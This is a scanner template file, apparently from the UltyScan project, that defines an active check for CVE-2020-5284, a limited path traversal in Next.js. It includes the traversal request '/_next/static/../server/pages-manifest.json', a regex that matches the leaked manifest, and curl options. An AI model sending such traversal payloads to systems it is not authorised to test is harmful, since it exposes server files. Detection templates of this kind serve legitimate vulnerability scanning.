Files
UltyScan/templates/active/CVE-2020-5284_-_Next_JS_Limited_Path_Traversal.sh

9 lines
282 B
Bash

AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5284 - Next JS Limited Path Traversal'
URI="/_next/static/../server/pages-manifest.json"
METHOD='GET'
MATCH='\{\"/_app\":\".*?_app\.js\"'
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'